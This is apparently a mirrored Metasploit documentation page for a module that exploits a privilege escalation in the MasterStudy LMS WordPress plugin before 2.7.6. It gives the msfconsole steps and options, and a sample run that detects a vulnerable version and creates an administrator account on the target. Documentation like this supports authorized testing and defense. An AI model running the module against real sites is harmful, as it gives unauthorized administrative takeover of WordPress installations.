CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/auxiliary/admin/http/wp_masterstudy_privesc.md
Views: 11788

Vulnerable Application

MasterStudy LMS, a WordPress plugin, prior to 2.7.6 is affected by a privilege escalation where an unauthenticated user is able to create an administrator account for wordpress itself.

The vulnerable version is available on WordPress' plugin directory.

Verification Steps

  1. msfconsole

  2. use auxiliary/admin/http/wp_masterstudy_privesc

  3. set RHOSTS <rhost>

  4. run

Options

USERNAME

Set a USERNAME if desirable. Defaults to empty, and random generation.

PASSWORD

Set a PASSWORD if desirable. Defaults to empty, and random generation.

EMAIL

Set a EMAIL if desirable. Defaults to empty, and random generation.

Scenarios

MasterStudy 2.7.5 on WordPress 5.7.5

[*] Processing masterstudy.rb for ERB directives.
resource (masterstudy.rb)> use auxiliary/admin/http/wp_masterstudy_privesc
resource (masterstudy.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (masterstudy.rb)> set verbose true
verbose => true
resource (masterstudy.rb)> run
[*] Running module against 1.1.1.1
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking /wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt
[*] Found version 2.7.5 in the plugin
[+] The target appears to be vulnerable.
[*] Attempting with username: ujukzntw7 password: TbxjFm0znF email: ashley.thompson@gcvz2cibu.org
[+] Account Created Successfully
[*] Auxiliary module execution completed